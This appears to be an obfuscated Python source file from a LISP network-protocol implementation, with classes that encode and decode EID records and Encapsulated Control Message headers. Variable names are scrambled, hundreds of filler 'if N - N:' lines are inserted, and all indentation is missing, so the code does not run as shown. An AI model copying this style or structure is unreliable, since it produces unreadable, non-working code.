if 65 - 65: OOooOOo . II111iiii * i11iIiiIii + OOooOOo
if 99 - 99: I1ii11iIi11i % Oo0Ooo
if 31 - 31: o0oOOo0O0Ooo - II111iiii * OOooOOo . OOooOOo - oO0o
if 57 - 57: OOooOOo / i11iIiiIii / I1Ii111 - Oo0Ooo . iIii1I11I1II1
if 84 - 84: IiII
if 42 - 42: O0 . I1Ii111 / I11i
if 69 - 69: OoOoOO00 / I1Ii111 * I1IiiI
if 76 - 76: O0 + II111iiii * OoO0O00
if 1 - 1: o0oOOo0O0Ooo
if 34 - 34: o0oOOo0O0Ooo + OOooOOo . OoO0O00 + I1IiiI + OoooooooOO
if 90 - 90: Ii1I / OoOoOO00 - iIii1I11I1II1 / i1IIi * I1Ii111 - ooOoO0o
if 2 - 2: iII111i * I11i * ooOoO0o + i11iIiiIii + oO0o
if 81 - 81: o0oOOo0O0Ooo * OoO0O00
if 18 - 18: i11iIiiIii / o0oOOo0O0Ooo - oO0o . I11i * i1IIi
if 67 - 67: Ii1I
if 64 - 64: OoOoOO00 + iII111i * OoOoOO00 - I1IiiI * OoooooooOO
if 27 - 27: II111iiii + i11iIiiIii
if 32 - 32: i1IIi
if 76 - 76: II111iiii % ooOoO0o - I1ii11iIi11i
if 50 - 50: II111iiii / I1IiiI . Ii1I % i11iIiiIii
if 66 - 66: oO0o / OOooOOo / iII111i
if 5 - 5: I1Ii111 . oO0o
if 77 - 77: iII111i / i11iIiiIii
if 20 - 20: O0 . I11i
class lisp_eid_record ( object ) :
def __init__ ( self ) :
self . record_ttl = 0
self . rloc_count = 0
self . action = 0
self . authoritative = False
self . ddt_incomplete = False
self . signature_count = 0
self . map_version = 0
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . record_ttl = 0
if 67 - 67: OoOoOO00 - ooOoO0o - iIii1I11I1II1
if 31 - 31: II111iiii + o0oOOo0O0Ooo * i11iIiiIii . o0oOOo0O0Ooo
def print_prefix ( self ) :
if ( self . group . is_null ( ) ) :
return ( green ( self . eid . print_prefix ( ) , False ) )
if 73 - 73: oO0o / OOooOOo * II111iiii % OoooooooOO - i1IIi - ooOoO0o
return ( green ( self . eid . print_sg ( self . group ) , False ) )
if 43 - 43: o0oOOo0O0Ooo + Ii1I % OoO0O00 . I1Ii111 + i1IIi
if 85 - 85: Oo0Ooo % I1ii11iIi11i / OOooOOo
def print_ttl ( self ) :
O0O00O = self . record_ttl
if ( self . record_ttl & 0x80000000 ) :
O0O00O = str ( self . record_ttl & 0x7fffffff ) + " secs"
elif ( ( O0O00O % 60 ) == 0 ) :
O0O00O = str ( old_div ( O0O00O , 60 ) ) + " hours"
else :
O0O00O = str ( O0O00O ) + " mins"
if 51 - 51: Oo0Ooo . Oo0Ooo
return ( O0O00O )
if 34 - 34: I1ii11iIi11i - i11iIiiIii
if 43 - 43: iIii1I11I1II1
def store_ttl ( self ) :
O0O00O = self . record_ttl * 60
if ( self . record_ttl & 0x80000000 ) : O0O00O = self . record_ttl & 0x7fffffff
return ( O0O00O )
if 73 - 73: OoOoOO00 + o0oOOo0O0Ooo
if 58 - 58: i1IIi * I1ii11iIi11i % iII111i . OoO0O00 % IiII % I11i
def print_record ( self , indent , ddt ) :
oO00O0o0Oo = ""
I1IIiIiIIiIiI = ""
IIi1iiIII11 = bold ( "invalid-action" , False )
if ( ddt ) :
if ( self . action < len ( lisp_map_referral_action_string ) ) :
IIi1iiIII11 = lisp_map_referral_action_string [ self . action ]
IIi1iiIII11 = bold ( IIi1iiIII11 , False )
oO00O0o0Oo = ( ", " + bold ( "ddt-incomplete" , False ) ) if self . ddt_incomplete else ""
if 69 - 69: I1ii11iIi11i . OoooooooOO % I1Ii111
I1IIiIiIIiIiI = ( ", sig-count: " + str ( self . signature_count ) ) if ( self . signature_count != 0 ) else ""
if 79 - 79: I1IiiI - IiII . OoooooooOO - I1ii11iIi11i
if 79 - 79: OOooOOo + o0oOOo0O0Ooo % iII111i . oO0o
else :
if ( self . action < len ( lisp_map_reply_action_string ) ) :
IIi1iiIII11 = lisp_map_reply_action_string [ self . action ]
if ( self . action != LISP_NO_ACTION ) :
IIi1iiIII11 = bold ( IIi1iiIII11 , False )
if 49 - 49: Ii1I + i11iIiiIii * OoOoOO00 . OoOoOO00 . I1ii11iIi11i . Oo0Ooo
if 61 - 61: I11i / OOooOOo
if 85 - 85: OoOoOO00 - I11i . OoOoOO00 . OoOoOO00
if 62 - 62: IiII % OoooooooOO * OoO0O00 + OoO0O00 % Ii1I % iII111i
i1I1iiiI = LISP_AFI_LCAF if ( self . eid . afi < 0 ) else self . eid . afi
IiiiI1 = ( "{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}" )
if 66 - 66: I1IiiI . OOooOOo - OoO0O00 % Oo0Ooo * o0oOOo0O0Ooo - oO0o
lprint ( IiiiI1 . format ( indent , self . print_ttl ( ) , self . rloc_count ,
IIi1iiIII11 , "auth" if ( self . authoritative is True ) else "non-auth" ,
oO00O0o0Oo , I1IIiIiIIiIiI , self . map_version , i1I1iiiI ,
green ( self . print_prefix ( ) , False ) ) )
if 68 - 68: I11i - i11iIiiIii / o0oOOo0O0Ooo + ooOoO0o / I1IiiI
if 31 - 31: I1Ii111 . OoooooooOO . i1IIi
def encode ( self ) :
oOoO0OooO0O = self . action << 13
if ( self . authoritative ) : oOoO0OooO0O |= 0x1000
if ( self . ddt_incomplete ) : oOoO0OooO0O |= 0x800
if 45 - 45: IiII
if 24 - 24: oO0o % o0oOOo0O0Ooo + ooOoO0o / II111iiii - ooOoO0o * iII111i
if 43 - 43: iII111i * i1IIi . I1IiiI . OoOoOO00 / IiII - Oo0Ooo
if 95 - 95: OoooooooOO % OOooOOo * OOooOOo
i1I1iiiI = self . eid . afi if ( self . eid . instance_id == 0 ) else LISP_AFI_LCAF
if ( i1I1iiiI < 0 ) : i1I1iiiI = LISP_AFI_LCAF
I1iiIiI1II1ii = ( self . group . is_null ( ) == False )
if ( I1iiIiI1II1ii ) : i1I1iiiI = LISP_AFI_LCAF
if 10 - 10: O0 % I11i + I1ii11iIi11i - i11iIiiIii % i1IIi + II111iiii
iii1I = ( self . signature_count << 12 ) | self . map_version
OOOoOo0o0Ooo = 0 if self . eid . is_binary ( ) == False else self . eid . mask_len
if 55 - 55: OoOoOO00 * I1Ii111 % OoO0O00 - OoO0O00
Oo00oo = struct . pack ( "IBBHHH" , socket . htonl ( self . record_ttl ) ,
self . rloc_count , OOOoOo0o0Ooo , socket . htons ( oOoO0OooO0O ) ,
socket . htons ( iii1I ) , socket . htons ( i1I1iiiI ) )
if 34 - 34: O0 * OoO0O00 - oO0o - IiII * Ii1I . II111iiii
if 28 - 28: O0 % iII111i - i1IIi
if 49 - 49: ooOoO0o . I11i - iIii1I11I1II1
if 41 - 41: ooOoO0o * i11iIiiIii % ooOoO0o . oO0o
if ( I1iiIiI1II1ii ) :
Oo00oo += self . eid . lcaf_encode_sg ( self . group )
return ( Oo00oo )
if 97 - 97: oO0o - iII111i + IiII . OoOoOO00 + iIii1I11I1II1
if 75 - 75: ooOoO0o + ooOoO0o . I1Ii111 % iII111i / iIii1I11I1II1 * iII111i
if 13 - 13: II111iiii * i11iIiiIii - i1IIi * OoO0O00 + i1IIi
if 43 - 43: O0 % oO0o * I1IiiI
if 64 - 64: II111iiii + i11iIiiIii
if ( self . eid . afi == LISP_AFI_GEO_COORD and self . eid . instance_id == 0 ) :
Oo00oo = Oo00oo [ 0 : - 2 ]
Oo00oo += self . eid . address . encode_geo ( )
return ( Oo00oo )
if 17 - 17: O0 * I1IiiI
if 40 - 40: iIii1I11I1II1 * iII111i % iIii1I11I1II1
if 39 - 39: i1IIi . Ii1I - Oo0Ooo
if 91 - 91: I1IiiI - OoooooooOO - OoooooooOO
if 69 - 69: iII111i * i11iIiiIii / i1IIi
if ( i1I1iiiI == LISP_AFI_LCAF ) :
Oo00oo += self . eid . lcaf_encode_iid ( )
return ( Oo00oo )
if 86 - 86: I1IiiI % I11i * O0 + i1IIi % I1Ii111
if 97 - 97: II111iiii * OoOoOO00 - I1Ii111 / i11iIiiIii / OoOoOO00
if 25 - 25: Oo0Ooo / Oo0Ooo
if 74 - 74: OOooOOo
if 30 - 30: O0 . Ii1I / o0oOOo0O0Ooo + I1IiiI - O0
Oo00oo += self . eid . pack_address ( )
return ( Oo00oo )
if 88 - 88: i11iIiiIii
if 33 - 33: OoO0O00 + O0
def decode ( self , packet ) :
iiII1iiI = "IBBHHH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 20 - 20: o0oOOo0O0Ooo % I11i . ooOoO0o - i1IIi . O0
self . record_ttl , self . rloc_count , self . eid . mask_len , oOoO0OooO0O , self . map_version , self . eid . afi = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 10 - 10: i1IIi
if 49 - 49: I1Ii111 - Ii1I . O0
if 46 - 46: OOooOOo
self . record_ttl = socket . ntohl ( self . record_ttl )
oOoO0OooO0O = socket . ntohs ( oOoO0OooO0O )
self . action = ( oOoO0OooO0O >> 13 ) & 0x7
self . authoritative = True if ( ( oOoO0OooO0O >> 12 ) & 1 ) else False
self . ddt_incomplete = True if ( ( oOoO0OooO0O >> 11 ) & 1 ) else False
self . map_version = socket . ntohs ( self . map_version )
self . signature_count = self . map_version >> 12
self . map_version = self . map_version & 0xfff
self . eid . afi = socket . ntohs ( self . eid . afi )
self . eid . instance_id = 0
packet = packet [ ooo0000oo0 : : ]
if 64 - 64: I1IiiI / OoOoOO00
if 6 - 6: i11iIiiIii - iII111i * i1IIi - iII111i
if 8 - 8: I11i / i11iIiiIii . O0 / OoO0O00 * oO0o + I1Ii111
if 91 - 91: I1IiiI
if ( self . eid . afi == LISP_AFI_LCAF ) :
packet , oo0oOooo0O = self . eid . lcaf_decode_eid ( packet )
if ( oo0oOooo0O ) : self . group = oo0oOooo0O
self . group . instance_id = self . eid . instance_id
return ( packet )
if 2 - 2: IiII + I11i / iIii1I11I1II1 . i11iIiiIii . i1IIi * ooOoO0o
if 14 - 14: Oo0Ooo . O0 - oO0o - i11iIiiIii
packet = self . eid . unpack_address ( packet )
return ( packet )
if 8 - 8: I1IiiI / iIii1I11I1II1 / OoooooooOO / Oo0Ooo / ooOoO0o
if 80 - 80: I11i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 26 - 26: II111iiii + I1IiiI . II111iiii - oO0o % OoO0O00
if 1 - 1: OoO0O00 - II111iiii
if 75 - 75: Oo0Ooo - OoOoOO00 + oO0o % i1IIi * OOooOOo
if 56 - 56: OoOoOO00 / OoO0O00 / I1IiiI % OoooooooOO
if 39 - 39: I1IiiI + II111iiii * Oo0Ooo % Ii1I . o0oOOo0O0Ooo * oO0o
if 42 - 42: Ii1I / Oo0Ooo
if 25 - 25: OoooooooOO % Ii1I * I1Ii111 * I11i + I1IiiI % I1ii11iIi11i
if 70 - 70: Ii1I + I1ii11iIi11i * I11i * i1IIi . I1Ii111
if 76 - 76: OoooooooOO * OoOoOO00 . OoooooooOO
if 46 - 46: ooOoO0o * o0oOOo0O0Ooo % II111iiii / I1Ii111
if 29 - 29: OoO0O00 - i11iIiiIii % Oo0Ooo % o0oOOo0O0Ooo
if 30 - 30: oO0o - Ii1I % Ii1I
if 8 - 8: IiII
if 68 - 68: IiII . OoooooooOO - i11iIiiIii + i11iIiiIii
if 81 - 81: OoOoOO00 + iII111i . i11iIiiIii
if 10 - 10: OoOoOO00 + I11i - iIii1I11I1II1 - I11i
if 58 - 58: ooOoO0o
if 98 - 98: Ii1I / OoO0O00 % OoooooooOO
if 65 - 65: ooOoO0o % Oo0Ooo - I1IiiI % I1Ii111 + iIii1I11I1II1 / iIii1I11I1II1
if 94 - 94: IiII - Oo0Ooo . o0oOOo0O0Ooo - ooOoO0o - oO0o . I11i
if 39 - 39: oO0o + OoOoOO00
if 68 - 68: i1IIi * oO0o / i11iIiiIii
if 96 - 96: I1IiiI
if 78 - 78: OoO0O00
if 72 - 72: I1ii11iIi11i / O0 % II111iiii / II111iiii
if 48 - 48: OOooOOo % OOooOOo / iIii1I11I1II1 - i11iIiiIii
if 57 - 57: I11i / IiII * i1IIi + II111iiii . o0oOOo0O0Ooo
if 11 - 11: II111iiii
if 66 - 66: Ii1I - I1IiiI . OoooooooOO * I1Ii111
if 16 - 16: IiII * OoO0O00 * i11iIiiIii - ooOoO0o
if 88 - 88: iIii1I11I1II1 / Ii1I * IiII / I1Ii111
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
if 31 - 31: O0 . I1IiiI
class lisp_ecm ( object ) :
def __init__ ( self , sport ) :
self . security = False
self . ddt = False
self . to_etr = False
self . to_ms = False
self . length = 0
self . ttl = LISP_DEFAULT_ECM_TTL
self . protocol = LISP_UDP_PROTOCOL
self . ip_checksum = 0
self . source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . udp_sport = sport
self . udp_dport = LISP_CTRL_PORT
self . udp_checksum = 0
self . udp_length = 0
self . afi = LISP_AFI_NONE
if 8 - 8: OoOoOO00
if 99 - 99: iII111i
def print_ecm ( self ) :
IiiiI1 = ( "{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}" )
if 93 - 93: I1Ii111
lprint ( IiiiI1 . format ( bold ( "ECM" , False ) , "S" if self . security else "s" ,
"D" if self . ddt else "d" , "E" if self . to_etr else "e" ,
"M" if self . to_ms else "m" ,
green ( self . source . print_address ( ) , False ) ,
green ( self . dest . print_address ( ) , False ) , self . udp_sport ,
self . udp_dport ) )
if 39 - 39: Ii1I
if 10 - 10: OoOoOO00 . iIii1I11I1II1 / I1ii11iIi11i % iII111i / i11iIiiIii
def encode ( self , packet , inner_source , inner_dest ) :
self . udp_length = len ( packet ) + 8
self . source = inner_source
self . dest = inner_dest
if ( inner_dest . is_ipv4 ( ) ) :
self . afi = LISP_AFI_IPV4
self . length = self . udp_length + 20
if 14 - 14: i11iIiiIii % o0oOOo0O0Ooo * O0 % iIii1I11I1II1 . IiII - II111iiii
if ( inner_dest . is_ipv6 ( ) ) :
self . afi = LISP_AFI_IPV6
self . length = self . udp_length
if 14 - 14: Ii1I % ooOoO0o - OoOoOO00
if 52 - 52: OoO0O00 / i1IIi - Ii1I
if 8 - 8: oO0o + ooOoO0o . I1ii11iIi11i . i1IIi / I1IiiI . IiII
if 8 - 8: i1IIi * O0
if 60 - 60: Oo0Ooo - II111iiii + I1IiiI
if 17 - 17: OoOoOO00 % I1IiiI
iIiIii = ( LISP_ECM << 28 )
if ( self . security ) : iIiIii |= 0x08000000
if ( self . ddt ) : iIiIii |= 0x04000000
if ( self . to_etr ) : iIiIii |= 0x02000000
if ( self . to_ms ) : iIiIii |= 0x01000000
if 8 - 8: Oo0Ooo
III1iI1III1I1 = struct . pack ( "I" , socket . htonl ( iIiIii ) )
if 4 - 4: ooOoO0o
O0O = ""
if ( self . afi == LISP_AFI_IPV4 ) :
O0O = struct . pack ( "BBHHHBBH" , 0x45 , 0 , socket . htons ( self . length ) ,
0 , 0 , self . ttl , self . protocol , socket . htons ( self . ip_checksum ) )
O0O += self . source . pack_address ( )
O0O += self . dest . pack_address ( )
O0O = lisp_ip_checksum ( O0O )
if 71 - 71: I1Ii111 + i1IIi * Oo0Ooo
if ( self . afi == LISP_AFI_IPV6 ) :
O0O = struct . pack ( "BBHHBB" , 0x60 , 0 , 0 , socket . htons ( self . length ) ,
self . protocol , self . ttl )
O0O += self . source . pack_address ( )
O0O += self . dest . pack_address ( )
if 51 - 51: OoooooooOO * O0 - OoO0O00 . Oo0Ooo % II111iiii + IiII
if 48 - 48: IiII . II111iiii - i11iIiiIii * iII111i
I111 = socket . htons ( self . udp_sport )
IiI11I111 = socket . htons ( self . udp_dport )
oOO0O00o0O0 = socket . htons ( self . udp_length )
I1i11i = socket . htons ( self . udp_checksum )
O0I1II1 = struct . pack ( "HHHH" , I111 , IiI11I111 , oOO0O00o0O0 , I1i11i )
return ( III1iI1III1I1 + O0O + O0I1II1 )
if 51 - 51: OoooooooOO + I11i . iII111i + i11iIiiIii * iII111i - OoO0O00
if 60 - 60: iII111i * iIii1I11I1II1 . OoOoOO00 . o0oOOo0O0Ooo / iIii1I11I1II1
def decode ( self , packet ) :
if 36 - 36: i1IIi . OoooooooOO - II111iiii - OoOoOO00 - IiII
if 53 - 53: I1ii11iIi11i - II111iiii . i11iIiiIii
if 76 - 76: iIii1I11I1II1 - Oo0Ooo
if 79 - 79: I1IiiI * IiII . OoooooooOO % I1Ii111 * I1Ii111
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 17 - 17: I1Ii111 - I1Ii111 . oO0o / I1Ii111
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 36 - 36: I1ii11iIi11i * i1IIi + iIii1I11I1II1
iIiIii = socket . ntohl ( iIiIii [ 0 ] )
self . security = True if ( iIiIii & 0x08000000 ) else False
self . ddt = True if ( iIiIii & 0x04000000 ) else False
self . to_etr = True if ( iIiIii & 0x02000000 ) else False
self . to_ms = True if ( iIiIii & 0x01000000 ) else False
packet = packet [ ooo0000oo0 : : ]
if 55 - 55: I1IiiI . I1Ii111 - I1IiiI % oO0o / iIii1I11I1II1 * Ii1I
if 77 - 77: OOooOOo
if 29 - 29: II111iiii % iIii1I11I1II1 * O0 . o0oOOo0O0Ooo
if 56 - 56: i1IIi . ooOoO0o + I11i - i11iIiiIii
if ( len ( packet ) < 1 ) : return ( None )
I1IiI = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
I1IiI = I1IiI >> 4
if 100 - 100: iIii1I11I1II1 - i1IIi . OOooOOo
if ( I1IiI == 4 ) :
ooo0000oo0 = struct . calcsize ( "HHIBBH" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 73 - 73: I1Ii111 / I11i / i11iIiiIii - I1ii11iIi11i % ooOoO0o
Oo0OoO00O , oOO0O00o0O0 , Oo0OoO00O , IIiIIiiiiI , iIIiiIi , I1i11i = struct . unpack ( "HHIBBH" , packet [ : ooo0000oo0 ] )
self . length = socket . ntohs ( oOO0O00o0O0 )
self . ttl = IIiIIiiiiI
self . protocol = iIIiiIi
self . ip_checksum = socket . ntohs ( I1i11i )
self . source . afi = self . dest . afi = LISP_AFI_IPV4
if 24 - 24: IiII + I1IiiI . O0 + OOooOOo / O0
if 59 - 59: i1IIi . II111iiii . Oo0Ooo + oO0o
if 65 - 65: I1IiiI / OoOoOO00 % I1IiiI * i11iIiiIii * OoooooooOO / I11i
if 91 - 91: i11iIiiIii / i11iIiiIii
iIIiiIi = struct . pack ( "H" , 0 )
I1I1I = struct . calcsize ( "HHIBB" )
Ii11I = struct . calcsize ( "H" )
packet = packet [ : I1I1I ] + iIIiiIi + packet [ I1I1I + Ii11I : ]
if 84 - 84: OoooooooOO + OoOoOO00 . Ii1I / i1IIi
packet = packet [ ooo0000oo0 : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 15 - 15: II111iiii % i1IIi / oO0o . iIii1I11I1II1 * Oo0Ooo
if 5 - 5: iII111i
if ( I1IiI == 6 ) :
ooo0000oo0 = struct . calcsize ( "IHBB" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 61 - 61: OOooOOo * OoO0O00 - O0
Oo0OoO00O , oOO0O00o0O0 , iIIiiIi , IIiIIiiiiI = struct . unpack ( "IHBB" , packet [ : ooo0000oo0 ] )
self . length = socket . ntohs ( oOO0O00o0O0 )
self . protocol = iIIiiIi
self . ttl = IIiIIiiiiI
self . source . afi = self . dest . afi = LISP_AFI_IPV6
if 30 - 30: iIii1I11I1II1
packet = packet [ ooo0000oo0 : : ]
packet = self . source . unpack_address ( packet )
if ( packet == None ) : return ( None )
packet = self . dest . unpack_address ( packet )
if ( packet == None ) : return ( None )
if 14 - 14: o0oOOo0O0Ooo + Ii1I
if 91 - 91: OoooooooOO / oO0o + OoOoOO00
self . source . mask_len = self . source . host_mask_len ( )
self . dest . mask_len = self . dest . host_mask_len ( )
if 100 - 100: i1IIi
ooo0000oo0 = struct . calcsize ( "HHHH" )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 13 - 13: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo
I111 , IiI11I111 , oOO0O00o0O0 , I1i11i = struct . unpack ( "HHHH" , packet [ : ooo0000oo0 ] )
self . udp_sport = socket . ntohs ( I111 )
self . udp_dport = socket . ntohs ( IiI11I111 )
self . udp_length = socket . ntohs ( oOO0O00o0O0 )
self . udp_checksum = socket . ntohs ( I1i11i )
packet = packet [ ooo0000oo0 : : ]
return ( packet )
if 31 - 31: i11iIiiIii % OoO0O00 . i11iIiiIii % oO0o - i1IIi
if 62 - 62: oO0o + oO0o . OoooooooOO
if 59 - 59: iIii1I11I1II1 . Oo0Ooo * I11i
if 29 - 29: Oo0Ooo - I1IiiI * I11i
if 58 - 58: i1IIi * Ii1I / ooOoO0o % iIii1I11I1II1
if 24 - 24: OoOoOO00 - o0oOOo0O0Ooo * I1IiiI . I11i / OoO0O00 * Ii1I
if 12 - 12: OoooooooOO % oO0o
if 92 - 92: ooOoO0o % OoO0O00 + O0 + OoOoOO00 / OoO0O00 * iIii1I11I1II1
if 79 - 79: O0
if 71 - 71: OoO0O00 - O0
if 73 - 73: iIii1I11I1II1
if 7 - 7: OoOoOO00
if 55 - 55: oO0o . OoO0O00 + iIii1I11I1II1 + OoOoOO00 / I1ii11iIi11i - O0
if 14 - 14: II111iiii - OoO0O00 - O0 * OoooooooOO / I1IiiI
if 3 - 3: I11i
if 46 - 46: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1
if 25 - 25: II111iiii / OOooOOo + Oo0Ooo - iIii1I11I1II1 - OoOoOO00
if 97 - 97: OOooOOo . OOooOOo / I1ii11iIi11i + I1IiiI * i1IIi
if 53 - 53: O0
if 28 - 28: iII111i % OoO0O00 . OoO0O00 / IiII * Oo0Ooo * iII111i
if 49 - 49: I1IiiI / I1Ii111 * iII111i + I1IiiI % oO0o % ooOoO0o
if 27 - 27: OoO0O00 / iII111i . I1ii11iIi11i
if 71 - 71: OoO0O00 . i11iIiiIii . iIii1I11I1II1 + I1IiiI - o0oOOo0O0Ooo
if 34 - 34: iII111i
if 6 - 6: OoO0O00 . OoOoOO00 + I1ii11iIi11i
if 24 - 24: OoO0O00 . Ii1I
if 26 - 26: O0 * I1IiiI - OOooOOo * OoooooooOO * II111iiii % OoOoOO00
if 56 - 56: OOooOOo * i11iIiiIii % ooOoO0o * OoOoOO00 % Oo0Ooo * IiII
if 30 - 30: i1IIi + o0oOOo0O0Ooo - OoOoOO00 . OOooOOo
if 95 - 95: i1IIi . I11i + O0 . I11i - I11i / Oo0Ooo
if 41 - 41: OoooooooOO . OOooOOo - Ii1I * OoO0O00 % i11iIiiIii
if 7 - 7: Ii1I
if 16 - 16: IiII * o0oOOo0O0Ooo % II111iiii - II111iiii + ooOoO0o
if 55 - 55: OoO0O00 % OoOoOO00
if 58 - 58: Ii1I
if 17 - 17: OoO0O00 - oO0o % Oo0Ooo % oO0o * I1Ii111 / IiII
if 88 - 88: ooOoO0o . II111iiii * O0 % IiII
if 15 - 15: O0 % i1IIi - OOooOOo . IiII
if 1 - 1: I1IiiI
if 40 - 40: o0oOOo0O0Ooo % I11i % O0
if 88 - 88: o0oOOo0O0Ooo - oO0o
if 73 - 73: II111iiii
if 7 - 7: O0 / OoO0O00
if 90 - 90: iII111i % oO0o / iIii1I11I1II1
if 52 - 52: I1IiiI / o0oOOo0O0Ooo
if 20 - 20: I1Ii111 . I1IiiI - iIii1I11I1II1 / iII111i
if 46 - 46: I1Ii111 . i11iIiiIii
if 89 - 89: OoO0O00 - OOooOOo - i1IIi - OoO0O00 % iIii1I11I1II1
if 52 - 52: o0oOOo0O0Ooo * O0 + I1ii11iIi11i
if 83 - 83: I11i + OOooOOo - OoooooooOO
if 7 - 7: IiII % ooOoO0o / OoooooooOO / o0oOOo0O0Ooo + OoO0O00 - OoO0O00
if 15 - 15: i1IIi + OOooOOo / Ii1I
if 51 - 51: OOooOOo + O0
if 91 - 91: i11iIiiIii + o0oOOo0O0Ooo % OoO0O00 / oO0o - i1IIi
if 82 - 82: Ii1I . OoooooooOO + OoooooooOO % OoO0O00 % I1ii11iIi11i
if 65 - 65: Oo0Ooo . I11i
if 7 - 7: Oo0Ooo * II111iiii
if 11 - 11: OoOoOO00 % OoooooooOO
if 92 - 92: OoOoOO00 - iII111i * Ii1I - i1IIi
if 87 - 87: Ii1I * I1Ii111 + iIii1I11I1II1 * o0oOOo0O0Ooo * iIii1I11I1II1 . I11i
if 66 - 66: Ii1I / OoO0O00 . O0 . I11i % OoooooooOO / OOooOOo
if 49 - 49: I1IiiI * iII111i - OoO0O00 % Ii1I + Ii1I * I1Ii111
if 94 - 94: OoOoOO00 - I11i + Ii1I + OoOoOO00 + II111iiii
if 61 - 61: IiII + Ii1I / oO0o . OoooooooOO + iII111i
if 29 - 29: OOooOOo
if 69 - 69: oO0o % OoooooooOO * iII111i
if 58 - 58: oO0o / i11iIiiIii . OoOoOO00 % O0 / iIii1I11I1II1
if 50 - 50: I1Ii111 . I11i / O0 . I11i
if 91 - 91: i11iIiiIii . I1ii11iIi11i + I11i
if 67 - 67: I1ii11iIi11i * I1Ii111 * I1IiiI / I11i - IiII + oO0o
if 11 - 11: O0 + i1IIi / o0oOOo0O0Ooo * OoO0O00
if 64 - 64: i1IIi % IiII . ooOoO0o . iIii1I11I1II1 + OoO0O00 - iIii1I11I1II1
if 52 - 52: II111iiii - IiII
if 91 - 91: iIii1I11I1II1 + iII111i . I11i % i11iIiiIii - i11iIiiIii + I1IiiI
if 75 - 75: I1ii11iIi11i / I1IiiI - iIii1I11I1II1 / OoO0O00 * OOooOOo
if 73 - 73: OoooooooOO % IiII / I1Ii111 * I11i + i1IIi % i11iIiiIii
if 91 - 91: i11iIiiIii
if 6 - 6: O0 - iIii1I11I1II1 + I1Ii111 . o0oOOo0O0Ooo * i11iIiiIii
if 53 - 53: OOooOOo / I1IiiI / oO0o * OOooOOo / i1IIi - I1Ii111
if 71 - 71: O0 + Oo0Ooo % oO0o - o0oOOo0O0Ooo
if 82 - 82: iIii1I11I1II1
if 64 - 64: ooOoO0o + I1IiiI % OOooOOo + II111iiii
if 46 - 46: I1IiiI
if 72 - 72: iII111i
if 100 - 100: I1IiiI
if 55 - 55: i1IIi % IiII
if 44 - 44: oO0o - iIii1I11I1II1 / ooOoO0o - iIii1I11I1II1 % i1IIi + ooOoO0o
if 74 - 74: I11i . OoOoOO00 + OoOoOO00
if 87 - 87: IiII + o0oOOo0O0Ooo . i1IIi % I1Ii111
if 44 - 44: Oo0Ooo - OOooOOo . Ii1I * OoooooooOO
if 93 - 93: OoO0O00 . OoO0O00
if 52 - 52: OOooOOo . oO0o / Oo0Ooo . OoooooooOO % I1ii11iIi11i
if 65 - 65: ooOoO0o % II111iiii . iII111i - iIii1I11I1II1 - I1IiiI
if 63 - 63: I1IiiI . OoOoOO00 - II111iiii
if 55 - 55: ooOoO0o - o0oOOo0O0Ooo
if 32 - 32: I1Ii111 * Ii1I / I1Ii111 . OoOoOO00 + I1ii11iIi11i - ooOoO0o
if 14 - 14: IiII * O0 + O0 - ooOoO0o . i11iIiiIii - IiII
if 37 - 37: I11i
if 19 - 19: OoooooooOO % I1Ii111
if 57 - 57: OoOoOO00 + i1IIi . iIii1I11I1II1 . iIii1I11I1II1 / iIii1I11I1II1 % oO0o
if 7 - 7: i11iIiiIii * I1ii11iIi11i / OoO0O00 * oO0o
if 35 - 35: IiII . i1IIi + I1ii11iIi11i . IiII + ooOoO0o . oO0o
if 2 - 2: II111iiii
if 18 - 18: iIii1I11I1II1 % I1ii11iIi11i % Oo0Ooo
if 47 - 47: ooOoO0o - I1IiiI % OOooOOo * Ii1I % I1IiiI
if 95 - 95: OoO0O00 + OoOoOO00 % Oo0Ooo . Ii1I * I1IiiI + I1Ii111
if 22 - 22: Oo0Ooo . OoO0O00
if 55 - 55: Oo0Ooo % OoooooooOO * II111iiii % OoooooooOO
if 30 - 30: I1Ii111 / o0oOOo0O0Ooo + OoooooooOO + OoOoOO00 + OoO0O00
if 40 - 40: OoooooooOO / IiII
if 82 - 82: i11iIiiIii - oO0o - i1IIi
if 78 - 78: oO0o % iII111i / i1IIi / ooOoO0o
if 44 - 44: o0oOOo0O0Ooo + Ii1I + I1IiiI % O0
if 100 - 100: OoooooooOO
if 27 - 27: i11iIiiIii % II111iiii + I1Ii111
if 76 - 76: OOooOOo - I1Ii111 + iIii1I11I1II1 + I1IiiI * oO0o
if 93 - 93: i11iIiiIii * i11iIiiIii - I1IiiI + iIii1I11I1II1 * i11iIiiIii
if 14 - 14: ooOoO0o . OoooooooOO . I1IiiI - IiII + iIii1I11I1II1
if 47 - 47: OOooOOo % i1IIi
if 23 - 23: Ii1I * Ii1I / I11i
if 11 - 11: OOooOOo
if 58 - 58: OoO0O00 * OoooooooOO
if 47 - 47: iII111i - Oo0Ooo
if 19 - 19: O0 . i1IIi + I11i / II111iiii + ooOoO0o
if 26 - 26: Ii1I * oO0o % I1IiiI - OOooOOo . I1Ii111
if 35 - 35: i1IIi % i11iIiiIii + Ii1I
